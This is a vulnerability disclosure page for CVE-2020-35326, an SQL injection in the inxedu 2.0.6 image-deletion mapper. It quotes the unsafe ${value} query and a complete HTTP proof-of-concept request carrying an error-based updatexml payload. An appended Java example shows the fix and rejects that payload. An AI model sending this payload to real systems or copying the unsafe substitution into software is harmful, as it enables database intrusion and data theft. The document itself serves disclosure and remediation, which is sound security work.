CVE-2020-35326: SQL Injection-2 · Issue #I14DNJ · 因酷/inxedu - Gitee.com
SQL Injection vulnerability in file /inxedu/demo_inxedu_open/src/main/resources/mybatis/inxedu/website/WebsiteImagesMapper.xml in inxedu 2.0.6 via the id value.
/inxedu/demo_inxedu_open/src/main/resources/mybatis/inxedu/website/WebsiteImagesMapper.xml
<!-- Delete advertisement images -->
<delete id="deleteImages" parameterType="java.lang.String">
DELETE FROM EDU_WEBSITE_IMAGES WHERE IMAGE_ID IN(${value})
</delete>
POST /admin/website/delImages HTTP/1.1
Host: 127.0.0.1:82
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
Origin: http://127.0.0.1:82
Connection: close
Referer: http://127.0.0.1:82/admin/website/imagesPage
Cookie: admin-token=; JSESSIONID=51DA0B24124A0158F5809EEDD2F7F1E2; inxedulogin_sys_user_=inxedulogin_sys_user_1
Upgrade-Insecure-Requests: 1

imageId=320) or updatexml(1,concat(0x7e,(user())),0) #
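
The remediation for the `${value}` substitution shown above, as an added example that is not part of the original report or the inxedu code base: parse the `imageId` form value into typed IDs before it reaches the mapper, and bind each ID with `#{}` inside a `<foreach>`. The class and method names are hypothetical, and it assumes image IDs are comma-separated positive integers and that the DAO passes the resulting list as the statement's only parameter.

```java
import java.util.ArrayList;
import java.util.List;

/*
 * Hardened mapper statement (assumed shape; the DAO must pass a List<Long>):
 *
 * <delete id="deleteImages" parameterType="java.util.List">
 *   DELETE FROM EDU_WEBSITE_IMAGES WHERE IMAGE_ID IN
 *   <foreach collection="list" item="id" open="(" separator="," close=")">
 *     #{id}
 *   </foreach>
 * </delete>
 */
public class ImageIdParser {

    // Hypothetical helper: turns the raw "imageId" form value into typed IDs.
    static List<Long> parseImageIds(String raw) {
        if (raw == null || raw.trim().isEmpty()) {
            throw new IllegalArgumentException("imageId is empty");
        }
        List<Long> ids = new ArrayList<>();
        // Limit -1 keeps trailing empty tokens so "320," is rejected, not trimmed.
        for (String part : raw.split(",", -1)) {
            String token = part.trim();
            // Digits only, at most 18 of them, so the value always fits in a long.
            if (!token.matches("[0-9]{1,18}")) {
                throw new IllegalArgumentException("invalid image id");
            }
            ids.add(Long.parseLong(token));
        }
        return ids;
    }

    public static void main(String[] args) {
        // Constructed sample inputs; the last is the body of the request above.
        String[] samples = {
            "320",
            "320, 321,322",
            "320,",
            "320) or updatexml(1,concat(0x7e,(user())),0) #"
        };
        for (String s : samples) {
            try {
                System.out.println("accepted " + parseImageIds(s));
            } catch (IllegalArgumentException e) {
                // The raw input is deliberately not echoed into the message.
                System.out.println("rejected: " + e.getMessage());
            }
        }
    }
}
```

With `#{id}` MyBatis sends each ID as a prepared-statement parameter, so the mapper stays safe even if a caller skips the parsing step.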